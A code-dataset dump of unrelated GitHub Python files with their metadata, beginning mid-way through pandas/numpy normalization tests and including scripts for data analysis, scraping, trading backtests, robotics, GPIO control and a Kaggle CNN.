test_dataframe_with_rangeindex(self):\n \"\"\"DataFrames using a RangeIndex should be treated as sequences.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(df)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_dataframe_with_otherindex(self):\n \"\"\"DataFrames using other index types should be treated as mappings.\"\"\"\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n df = pandas.DataFrame(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(df)\n\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertIsInstance(result, IterItems)\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_multiple_columns(self):\n data = [(1, 'a'), (2, 'b'), (3, 'c')]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), data)\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: (1, 'a'), 1: (2, 'b'), 2: (3, 'c')}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_single_column(self):\n \"\"\"Single column DataFrame values should be unwrapped.\"\"\"\n data = [('x',), ('y',), ('z',)]\n\n # RangeIndex index\n df = pandas.DataFrame(data)\n result = _normalize_lazy(df)\n self.assertEqual(list(result), ['x', 'y', 'z'])\n\n # Int64Index index\n df = pandas.DataFrame(data, index=[0, 1, 2])\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n df = pandas.DataFrame(\n data=[('x',), ('y',), ('z',)],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(df)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_dataframe_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n df = pandas.DataFrame([('x',), ('y',), ('z',)], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(df)\n\n def test_series_with_rangeindex(self):\n \"\"\"Series using a RangeIndex should be treated as sequences.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data) # Pandas auto-assigns a RangeIndex.\n result = _normalize_lazy(s)\n\n self.assertIsInstance(result, TypedIterator)\n self.assertEqual(result.fetch(), data)\n\n def test_series_with_otherindex(self):\n \"\"\"Series using other index types should be treated as mappings.\"\"\"\n data = ['x', 'y', 'z']\n s = pandas.Series(data, index=[0, 1, 2]) # Defines an Int64Index.\n result = _normalize_lazy(s)\n\n expected = {0: 'x', 1: 'y', 2: 'z'}\n self.assertIsInstance(result, IterItems)\n self.assertEqual(dict(result), expected)\n\n def test_series_multiindex(self):\n \"\"\"Multi-index values should be tuples.\"\"\"\n s = pandas.Series(\n data=['x', 'y', 'z'],\n index=pandas.MultiIndex.from_tuples([(0, 0), (0, 1), (1, 0)]),\n )\n result = _normalize_lazy(s)\n self.assertIsInstance(result, IterItems)\n expected = {(0, 0): 'x', (0, 1): 'y', (1, 0): 'z'}\n self.assertEqual(dict(result), expected)\n\n def test_series_index_error(self):\n \"\"\"Indexes must contain unique values, no duplicates.\"\"\"\n s = pandas.Series(['x', 'y', 'z'], index=[0, 0, 1])\n with self.assertRaises(ValueError):\n _normalize_lazy(s)\n\n\n@unittest.skipUnless(numpy, 'requires numpy')\nclass TestNormalizeLazyNumpy(unittest.TestCase):\n def test_two_dimentional_array(self):\n arr = numpy.array([['a', 'x'], ['b', 'y']])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 'x'), ('b', 'y')])\n\n def test_two_valued_structured_array(self):\n arr = numpy.array([('a', 1), ('b', 2)],\n dtype=[('one', 'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_two_valued_recarray_array(self): # record array\n arr = numpy.rec.array([('a', 1), ('b', 2)],\n dtype=[('one', 'U10'), ('two', 'i4')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), [('a', 1), ('b', 2)])\n\n def test_one_dimentional_array(self):\n arr = numpy.array(['x', 'y', 'z'])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_structured_array(self):\n arr = numpy.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_single_valued_recarray_array(self): # record array\n arr = numpy.rec.array([('x',), ('y',), ('z',)],\n dtype=[('one', 'U10')])\n lazy = _normalize_lazy(arr)\n self.assertIsInstance(lazy, TypedIterator)\n self.assertEqual(lazy.fetch(), ['x', 'y', 'z'])\n\n def test_three_dimentional_array(self):\n \"\"\"Three-dimentional array normalization is not supported.\"\"\"\n arr = numpy.array([[[1, 3], ['a', 'x']], [[2, 4], ['b', 'y']]])\n result = _normalize_lazy(arr)\n self.assertIs(result, arr, msg='unsupported, returns unchanged')\n\n\nclass TestNormalizeLazyDBAPI2Cursor(unittest.TestCase):\n def setUp(self):\n conn = sqlite3.connect(':memory:')\n conn.executescript('''\n CREATE TABLE mydata(A, B, C);\n INSERT INTO mydata VALUES('x', 'foo', 20);\n INSERT INTO mydata VALUES('x', 'foo', 30);\n INSERT INTO mydata VALUES('y', 'foo', 10);\n INSERT INTO mydata VALUES('y', 'bar', 20);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n INSERT INTO mydata VALUES('z', 'bar', 10);\n ''')\n self.cursor = conn.cursor()\n\n def test_multiple_coumns(self):\n self.cursor.execute('SELECT A, B FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(\n list(result),\n [('x', 'foo'), ('x', 'foo'), ('y', 'foo'),\n ('y', 'bar'), ('z', 'bar'), ('z', 'bar')],\n )\n\n def test_single_column(self):\n \"\"\"Single column selections should be unwrapped.\"\"\"\n self.cursor.execute('SELECT C FROM mydata;')\n result = _normalize_lazy(self.cursor)\n self.assertEqual(list(result), [20, 30, 10, 20, 10, 10])\n\n\nclass TestNormalizeEager(unittest.TestCase):\n def test_unchanged(self):\n \"\"\"For given instances, should return original object.\"\"\"\n requirement = [1, 2, 3]\n self.assertIs(_normalize_eager(requirement), requirement)\n\n class MyRequirement(BaseRequirement):\n def __init__(self):\n pass\n\n def __iter__(self):\n return iter([])\n\n def check_data():\n return None\n\n requirement = MyRequirement()\n self.assertIs(_normalize_eager(requirement), requirement)\n\n def test_exhaustible_type(self):\n with self.assertRaises(TypeError, msg='cannot use generic iter'):\n _normalize_eager(iter([1, 2, 3]))\n\n output = _normalize_eager(iter([1, 2, 3]), default_type=set)\n self.assertEqual(output, set([1, 2, 3]))\n\n @unittest.skipUnless(squint, 'requires squint')\n def test_squint_object(self):\n result_obj = squint.Result(iter([1, 2, 3]), evaltype=tuple)\n output = _normalize_eager(result_obj)\n self.assertIsInstance(output, tuple)\n self.assertEqual(output, (1, 2, 3))\n\n def test_iter_items(self):\n items = IterItems(iter([(0, 'x'), (1, 'y'), (2, 'z')]))\n output = _normalize_eager(items)\n self.assertIsInstance(output, dict)\n self.assertEqual(output, {0: 'x', 1: 'y', 2: 'z'})\n","repo_name":"shawnbrown/datatest","sub_path":"tests/test_normalize.py","file_name":"test_normalize.py","file_ext":"py","file_size_in_byte":11655,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"18"}
+{"seq_id":"8833470864","text":"def compute_stop_positions():\r\n import math\r\n from math import sin\r\n\r\n Stop_positions = []\r\n Nsp = 0\r\n Psp=0\r\n cam_fov = 90 # in degrees\r\n rail_lenght = 100 #in meters\r\n max_obj_distance = 15 # in meters\r\n half_fov= cam_fov/2\r\n n = 90 - half_fov\r\n r = sin(math.radians(n))\r\n initial_pos = max_obj_distance * sin(math.radians(half_fov)) / sin(math.radians(n))\r\n\r\n r_initial_pos = round(initial_pos)\r\n Psp = r_initial_pos\r\n # print(r_initial_pos)\r\n Stop_positions.append(r_initial_pos)\r\n\r\n #print(Stop_positions)\r\n Nsp = r_initial_pos + 0.5*r_initial_pos\r\n Stop_positions.append(round(Nsp))\r\n\r\n #print(round(Nsp))\r\n while Nsp < rail_lenght:\r\n Psp = Nsp\r\n Nsp = Psp + round(0.5*Psp)\r\n if Nsp < rail_lenght:\r\n Stop_positions.append(round(Nsp))\r\n Psp += Nsp\r\n # print(Stop_positions)\r\n return Stop_positions\r\n\r\n#implement the movement\r\ncur_location = 0\r\nstop_pos = compute_stop_positions()\r\n\r\n\r\nfor position in stop_pos:\r\n cur_location = position\r\n if cur_location == position:\r\n #move camera to the position\r\n print(\"Camera is at \" + str(cur_location))\r\n # stop camera\r\n #take snap shot\r\n continue\r\n \r\n #","repo_name":"ubong-essien/Attendance-systemin-python","sub_path":"camera_control.py","file_name":"camera_control.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"71180879721","text":"from nbc import *\nfrom vanilla import *\nfrom data import *\nfrom matplotlib import pyplot as plt\n\nif __name__ == \"__main__\":\n\n sizes = [1, 5, 10, 20, 25, 30, 40, 50, 60, 70, 80, 90, 99]\n losses = []\n nbc_losses = []\n maxIter = 2\n for size in sizes:\n X = load_data(\"yelp_cat.csv\")\n x1, x2 = split_data(X, size)\n save_split(x1, x2)\n X = load_data(\"train-set.csv\")\n Xt = load_data(\"test-set.csv\")\n\n nbc = NBC(X.as_matrix(), Xt.as_matrix())\n nbc.train()\n nbcloss = nbc.predict_test()\n nbc_losses.append(nbcloss)\n print(\"nbc ZERO-ONE LOSS=\" + str(nbcloss))\n\n y = X['goodForGroups'].as_matrix()\n yt = Xt['goodForGroups'].as_matrix()\n mergeDf = binarize(X, Xt)\n X, Xt = split_vector(mergeDf[0], mergeDf[1])\n nn = train(X, maxIter, y)\n loss = predict_batch(Xt, yt, nn)\n losses.append(loss)\n print(\"pcp ZERO-ONE LOSS=\" + str(loss))\n print(\"\")\n\n plt.plot(sizes, losses)\n plt.plot(sizes, nbc_losses)\n plt.xlabel(\"Training set size %\")\n plt.ylabel(\"Zero one loss\")\n plt.show()\n","repo_name":"exponentialbit1024/PurdueCS","sub_path":"CS373/shah255-hw4/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"31205383100","text":"def read_matrix_as_dict(arr):\n ans = {}\n for i in range(len(states)):\n line = [float(x) for x in f.readline().split()[1:]]\n for (ind, x) in enumerate(line):\n ans[(states[i], arr[ind])] = x\n return ans\n\n\ndef skip(n):\n for _ in range(n):\n f.readline()\n\n\ndef reverse_string(str):\n return ''.join(str[::-1])\n\n\nif __name__ == '__main__':\n with open('rosalind_ba10c.txt', 'r') as f:\n input_string = f.readline().rstrip()\n skip(1)\n abc = f.readline().split()\n skip(1)\n states = f.readline().split()\n skip(2)\n t_matrix = read_matrix_as_dict(states)\n\n skip(2)\n e_matrix = read_matrix_as_dict(abc)\n\n scores = {(0, state): e_matrix[state, input_string[0]] * 1 / len(states) for state in states}\n next_states = {(0, state): '' for state in states}\n last_char = None\n for (idx, ch) in enumerate(input_string[1:]):\n for state in states:\n max_next_score = None\n for next_state in states:\n temp = (scores[idx, next_state] * t_matrix[next_state, state], next_state)\n if max_next_score is None or max_next_score < temp:\n max_next_score = temp\n scores[idx + 1, state] = max_next_score[0] * e_matrix[state, ch]\n next_states[idx + 1, state] = max_next_score[1]\n if idx == len(input_string) - 2:\n temp = (scores[idx + 1, state], state)\n if last_char is None or temp > last_char:\n last_char = temp\n\n ans = str(last_char[1])\n for i in range(len(input_string) - 1, -1, -1):\n ans += next_states[i, ans[-1]]\n\n print(reverse_string(ans))\n","repo_name":"paskudnicc/Itmo","sub_path":"3 year/bioinf/ba10c.py","file_name":"ba10c.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11071066494","text":"# -*- coding: utf-8 -*-\n# @Author : xiaohao\n# @Email : 321459055@qq.com\n# @File : comment_block.py\n# @Software: PyCharm\n# @Time : 2020/7/31 17:08\n\n\nfrom django import template\n\nfrom apps.comment.form import CommentForm\nfrom apps.comment.models import Comment\n\nregister = template.Library()\n\n\n@register.inclusion_tag('block.html')\ndef comment_block(target):\n \"\"\"Removes all values of arg from the given string\"\"\"\n return {\n 'target': target,\n 'comment_form': CommentForm(),\n 'comment_list': Comment.get_by_target(target)\n }\n","repo_name":"xiaohaogit/blog","sub_path":"myblog/apps/comment/templatetags/comment_block.py","file_name":"comment_block.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"71803166440","text":"\nimport sys\nimport os\nimport subprocess\n\nswig = sys.argv[1]\nargs = []\nfor arg in sys.argv[2:]:\n if arg.startswith('--FIX,'):\n inc_dirs = arg[6:].split(',SEP,')\n for inc_dir in inc_dirs:\n args.append('-I' + inc_dir)\n else:\n args.append(arg)\n\ncmdline = [swig] + args\n\nif 'VERBOSE' in os.environ:\n print('Fixed swig command line: ' + ' '.join(cmdline))\n\nsys.exit(subprocess.run(cmdline).returncode)\n","repo_name":"QuTech-Delft/OpenQL","sub_path":"python/compat/fix-swig-cmdline.py","file_name":"fix-swig-cmdline.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"18"}
+{"seq_id":"24860961613","text":"import pandas as pd\nimport numpy as np\nfrom mod_backtest_utils.backtest import *\n\nclass BBStrategy(Strategy):\n \"\"\"\n Requires:\n symbol: A stock symbol on which to form a strategy\n bars: A DataFrame of bars for the above symbol\n period: Look back period for BB indicator calculation\n stdmultiplier: the parameter to generate upper and lower band\n \n \"\"\"\n \n def __init__(self, symbol, bars, period, stdmultiplier):\n self.symbol = symbol\n self.bars = bars\n self.period = period\n self.stdmultiplier = stdmultiplier\n \n def generate_signals(self):\n \"\"\"\n Returns the DataFrame of symbols containing the signals to go long, short or hold (1, -1, 0)\n \"\"\"\n # initialize data frame of signals with the date from price data frame\n signals = pd.DataFrame(index=self.bars.index)\n signals['price'] = self.bars['price']\n \n # create bb value\n signals['middleband'] = signals['price'].rolling(window=self.period).mean()\n signals['upperband'] = signals['middleband'] + self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n signals['lowerband'] = signals['middleband'] - self.stdmultiplier * (signals['price'].rolling(window= self.period).std())\n\n # Create a signal (invested or not invested) \n # buy signal when rsi values crosses buy_threshold from bottom\n # sell signal when rsi values crosses sell_threshold from top\n signals['sell']= 0.0\n signals['buy']= 0.0\n signals['buy'][self.period:] = np.where(signals['price'][self.period:] < signals['lowerband'][self.period:], -1.0, 0.0)\n signals['sell'][self.period:] = np.where(signals['price'][self.period:] > signals['upperband'][self.period:],1.0,0)\n signals['buy'] = signals['buy'].diff()\n signals['sell'] = signals['sell'].diff()\n signals.loc[signals['buy'] == -1.0,['buy']]=0 \n signals.loc[signals['sell'] == 1.0,['sell']]=0 \n signals['buy_sell'] = signals['buy'] + signals['sell']\n return signals[['price', 'buy_sell']]","repo_name":"secmldev/stock-trading","sub_path":"mod_backtest_utils/backtest_bb.py","file_name":"backtest_bb.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"10468963872","text":"#!/usr/bin/env python\n # -*- coding: utf-8 -*-\n\nfrom mongoimporter import MongoImporter\nfrom pyquery import PyQuery\nimport urlparse\nimport mechanize\n\n\nclass VerlagScraper:\n\n def __init__(self):\n self.current_url = 'http://daten.ivw.eu/index.php?menuid=13&b=alle'\n\n self.__get_html_data()\n\n def __get_html_data(self):\n verlag_req = mechanize.Request(self.current_url)\n verlag_res = mechanize.urlopen(verlag_req)\n mongo = MongoImporter(coll=\"verlag\")\n\n py_query = PyQuery(verlag_res.read())\n link_list = py_query(\".lz_r a\")\n for link in link_list:\n query = urlparse.urlparse(py_query(link).attr('href')).query\n parsed_query = urlparse.parse_qs(query)\n vid = parsed_query['m'][0]\n title = parsed_query['t'][0].replace(\"Titel des Verlags \", \"\").replace('\"', '')\n decoded = title.replace(\"'\", \"\").replace(\"\\xed\", \"i\").replace(\"\\xd6\", \"Oe\").replace(\"\\xf6g\", \"oe\").replace(\"\\xdc\", \"UE\").replace(\"\\xf6\", \"ue\").replace(\"\\xfc\", \"ue\").replace(\"\\xdf\", \"ss\").replace(\"\\xc4\", \"Ae\").replace(\"\\xfc\", \"ae\").replace(\"\\xe0\", \"a\").replace(\"\\xe4\", \"ae\").replace(\"\\xe9\", \"e\")\n json = ({\"vid\": vid, \"title\": decoded})\n if decoded:\n mongo.insert_json(json)\n","repo_name":"g-div/ivw-viz","sub_path":"scraper/scraper/verlagscraper.py","file_name":"verlagscraper.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"27739557508","text":"import sys\r\n\r\nsys.setrecursionlimit(10 ** 6)\r\nMAX = 100000 + 10\r\nN, M, R = map(int, sys.stdin.readline().split())\r\ngraph = [[] for _ in range(MAX)]\r\nvisited = [False for _ in range(MAX)]\r\n\r\nglobal answer\r\nanswer = [0 for _ in range(N)]\r\nglobal order\r\norder = 1\r\n\r\nfor _ in range(M):\r\n x, y = map(int, sys.stdin.readline().split())\r\n graph[x].append(y)\r\n graph[y].append(x)\r\n\r\nfor i in range(1, N + 1):\r\n graph[i].sort()\r\n\r\n\r\ndef dfs(idx):\r\n visited[idx] = True\r\n global order\r\n answer[idx-1] = order\r\n order += 1\r\n\r\n data = graph[idx]\r\n for j in range(len(data)):\r\n new_idx = data[j]\r\n if not visited[new_idx]:\r\n dfs(new_idx)\r\n\r\n\r\ndfs(R)\r\n\r\nfor k in answer:\r\n print(k)\r\n","repo_name":"ZhenxiKim/leetCode","sub_path":"백준/Silver/24479. 알고리즘 수업 - 깊이 우선 탐색 1/알고리즘 수업 - 깊이 우선 탐색 1.py","file_name":"알고리즘 수업 - 깊이 우선 탐색 1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14793058095","text":"\nfrom .views import SumLikelihoodByYearView, InsightsByCountryView,AverageIntensityByTopicView, InsightsByTopicSectorView,InsightsScatterPlotView, InsightsByRegionView\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\n\n\n\nurlpatterns = [\n # path(\"\", include(router.urls)),\n path(\"intensity/\", AverageIntensityByTopicView.as_view(), name=\"intensity\" ),\n path(\"countryview/\", InsightsByCountryView.as_view(), name=\"country\" ),\n path(\"likelihood_by_yearview/\", SumLikelihoodByYearView.as_view(), name=\"likelihood\" ),\n path(\"insights_by_region/\", InsightsByRegionView.as_view(), name=\"region\" ),\n path(\"insights_by_topic_sector/\", InsightsByTopicSectorView.as_view(), name=\"topic\" ),\n path(\"insights_by_scatter_plotview/\", InsightsScatterPlotView.as_view(), name=\"scatter\" ),\n]\n\n","repo_name":"Pruthvi2121/Data-Vitulization-Dashboard","sub_path":"backend/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11202666844","text":"\"\"\"\nForget all the nice Object Oreintd Programming for now \nand just throw a few lables and control buttons on to a\ntkinter screen to test out the cheap QUIMAT touch screen\nwith the I2C 32 GPIO priopedia interace also plugged in\n\"\"\"\nimport tkinter as tk \nfrom tkinter import ttk\n# access the i2c 32xGPIO interface\nimport smbus\nbus = smbus.SMBus(0) # 0 for the original RPi, 1 for the newer version\n# using the I2C 32 GPIO priopedia interace set all of J23 to outputs\nbus.write_byte_data(0x20,0x00,0x00)\n# now set up the touch screen control buttons for the first output on J23\nwin = tk.Tk() \nwin.title(\"RPi GUI\") \n# Add a helpful Label\nttk.Label(win, text=\"Test GPIO interface\").grid(column=0, row=0)\n# A dirty bodge to put a bit of space into the window\nttk.Label(win, text=\"\").grid(column=0, row=1)\nttk.Label(win, text=\"\").grid(column=0, row=3)\nttk.Label(win, text=\"\").grid(column=0, row=5)\n\n# Button Click Functions\ndef clickOn():\n bus.write_byte_data(0x20,0x12,0x00)\ndef clickOff():\n bus.write_byte_data(0x20,0x12,0x01)\n\n# Adding a Button\naction1 = ttk.Button(win, text=\"Click on\", command=clickOn)\n# Position Button in second row (zero-based)\naction1.grid(column=0, row=2)\n# Adding a Button\naction2 = ttk.Button(win, text=\"Click off\", command=clickOff)\n# Position Button \naction2.grid(column=0, row=4)\n# Adding a Button\naction3 = ttk.Button(win, text=\"QUIT\", command=quit)\n# Position Button \naction3.grid(column=0, row=6)\n# Start the touch screen interface\nwin.mainloop()\n","repo_name":"doubledodge/Python-RPi-touchscreen","sub_path":"hello2.py","file_name":"hello2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39874997383","text":"import robot_actuator\nimport robot_sensor\nimport rospy\n\nclass Robot:\n def __init__(self,robot_name=''):\n self.actuators=[]\n self.sensors=[]\n self.robot_name=robot_name\n\n def act_once(self, actions):\n for i in range(len(self.actuators)):\n self.actuators[i].act_once(actions[i])\n\n def observe_once(self):\n observation = []\n for sensor in self.sensors:\n sensor.wait_new_msg()\n finish = False\n while not finish:\n rospy.rostime.wallsleep(0.01)\n finish = True\n for sensor in self.sensors:\n finish = finish and sensor.check_new_msg()\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def get_last_ob(self):\n observation=[]\n for sensor in self.sensors:\n observation.append(sensor.get_last_msg())\n return observation\n\n def begin_observation(self):\n for sensor in self.sensors:\n sensor.wait_new_msg()\n\n def check_observation(self):\n for sensor in self.sensors:\n if sensor.check_new_msg() == False:\n return False\n return True\n\n","repo_name":"chesternimiz/multi_robot_gym","sub_path":"multi_robot_gym/src/multi_robot_gym/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"11057872209","text":"#!/usr/bin/env python 3\r\n\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\npathway = \"C:/Users/soubi/OneDrive/Bureau/Travail/Calf1Calf2/\"\r\nneq_WT = np.loadtxt('{}Calf1Calf2_WT/Neq/CC_WT_traj_all_global.PB.Neq.txt'.format(pathway))\r\nneq_H798P = np.loadtxt('{}Calf1Calf2_H798P/PBxplore/md_CC_H798P_traj_all.PB.Neq.txt'.format(pathway))\r\n\r\nneq1 = neq_WT[:,1]\r\nneq2 = neq_H798P[:,1]\r\ndelta_neq = abs(neq1 - neq2)\r\nx = neq_WT[:,0]\r\n\r\nplt.xlabel(\"Residues\")\r\nplt.ylabel('Delta Neq')\r\nplt.title(\"Delta Neq WT vs H798P\")\r\nplt.plot(x, delta_neq)\r\n#plt.plot(neq1[:,0], neq1[:,1], color = 'r')\r\n#plt.plot(neq2[:,0], neq2[:,1], color = 'g')\r\nplt.show()\r\n\r\n'''\r\ndico_neq_H798P = {}\r\nfor i in neq1[:,0] :\r\n\tcol1 = i\r\n\tcol2 = delta_neq\r\n\tif col1 not in dico_neq_H798P.keys():\r\n\t\tdico_neq_H798P[col1] = col2\r\n\r\nfor key, val in dico_neq_H798P.items():\r\n\tprint(val)\r\n'''\r\n'''\r\ndico = {}\r\nfor i, j in zip(list(range(603,960)),delta_neq) :\r\n\tdico[i] = j\r\nfor k, v in dico.items() :\r\n\tif v >= 2 :\r\n\t\tprint(k, v)\r\n'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Soubika/StageM2","sub_path":"DNeq.py","file_name":"DNeq.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"71426929960","text":"import pandas as pd\nimport numpy as np\n\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D\nfrom keras.layers import MaxPooling2D\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import SGDClassifier\n\nimport seaborn as sns\n\nfrom tqdm import tqdm\nimport os\n# Initialize global variables\nSAMPLE_SIZE = 10000\nBATCH_SIZE = 32\nTEST_PERC = 0.2\nsegmentations = pd.read_csv(\"../input/train_ship_segmentations.csv\")\nsegmentations['path'] = '../input/train/' + segmentations['ImageId']\nsegmentations.shape\nsegmentations = segmentations.sample(n=SAMPLE_SIZE)\ndef has_ship(encoded_pixels):\n hs = [0 if pd.isna(n) else 1 for n in tqdm(encoded_pixels)]\n return hs\nsegmentations['HasShip'] = has_ship(segmentations['EncodedPixels'].values)\nsegmentations['HasShip'].head()\nsegmentations.head()\nsns.countplot(segmentations['HasShip'])\nnp.shape(load_img(segmentations['path'].values[0]))\ntrain,test = train_test_split(segmentations, test_size=TEST_PERC)\nidg_train = ImageDataGenerator(rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\nidg_test = ImageDataGenerator(rescale=1. / 255)\ndef flow_from_dataframe(img_data_gen, in_df, path_col, y_col, **dflow_args):\n base_dir = os.path.dirname(in_df[path_col].values[0])\n print('## Ignore next message from keras, values are replaced anyways')\n df_gen = img_data_gen.flow_from_directory(base_dir, \n class_mode = 'sparse',\n **dflow_args)\n df_gen.filenames = in_df[path_col].values\n df_gen.classes = np.stack(in_df[y_col].values)\n df_gen.samples = in_df.shape[0]\n df_gen.n = in_df.shape[0]\n df_gen._set_index_array()\n df_gen.directory = '' # since we have the full path\n print('Reinserting dataframe: {} images'.format(in_df.shape[0]))\n return df_gen\ntrain_images = flow_from_dataframe(idg_train, train, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntest_images = flow_from_dataframe(idg_train, test, 'path', 'HasShip', batch_size=BATCH_SIZE, target_size=(256, 256))\ntrain_images.target_size\nmodel = Sequential()\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Convolution2D(32, (3, 3),\n input_shape=(256, 256, 3),\n activation='relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(units=128, activation='relu', kernel_initializer='normal'))\nmodel.add(Dense(units=1, activation='sigmoid', kernel_initializer='normal'))\n\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\nfitted_model = model.fit_generator(train_images,\n steps_per_epoch=SAMPLE_SIZE*(1-TEST_PERC)/BATCH_SIZE,\n epochs=20,\n validation_data=test_images,\n validation_steps=SAMPLE_SIZE*(TEST_PERC)/BATCH_SIZE)\nimport matplotlib.pyplot as plt\nimport pylab\n\n\npath = 'results'\nname = 'adam'\n\nplt.plot(fitted_model.history['acc'])\nplt.plot(fitted_model.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\n\nplt.show()\nplt.figure()\nplt.gcf().clear()\nplt.plot(fitted_model.history['loss'])\nplt.plot(fitted_model.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\n\nplt.show()\n\n","repo_name":"aorursy/new-nb-3","sub_path":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_name":"grigorbezirganyan_detect-if-there-is-a-ship-by-cnn-base-model.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
